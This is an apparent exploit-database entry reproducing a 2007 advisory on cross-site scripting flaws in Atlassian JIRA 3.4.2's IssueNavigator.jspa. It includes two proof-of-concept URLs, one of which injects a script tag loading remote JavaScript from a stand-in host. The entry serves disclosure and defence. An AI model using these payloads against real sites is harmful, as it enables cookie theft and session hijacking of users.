Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting
Author: syniack
type: webapps
platform: jsp
port:
date_added: 2007-04-02
date_updated: 2013-11-25
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/23244/info
Atlassian JIRA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Version 3.4.2 is affected; prior versions may also be vulnerable.
http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><script>alert("xss");</script
http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><scriptsrc=http://www.example2.com/re.js></script>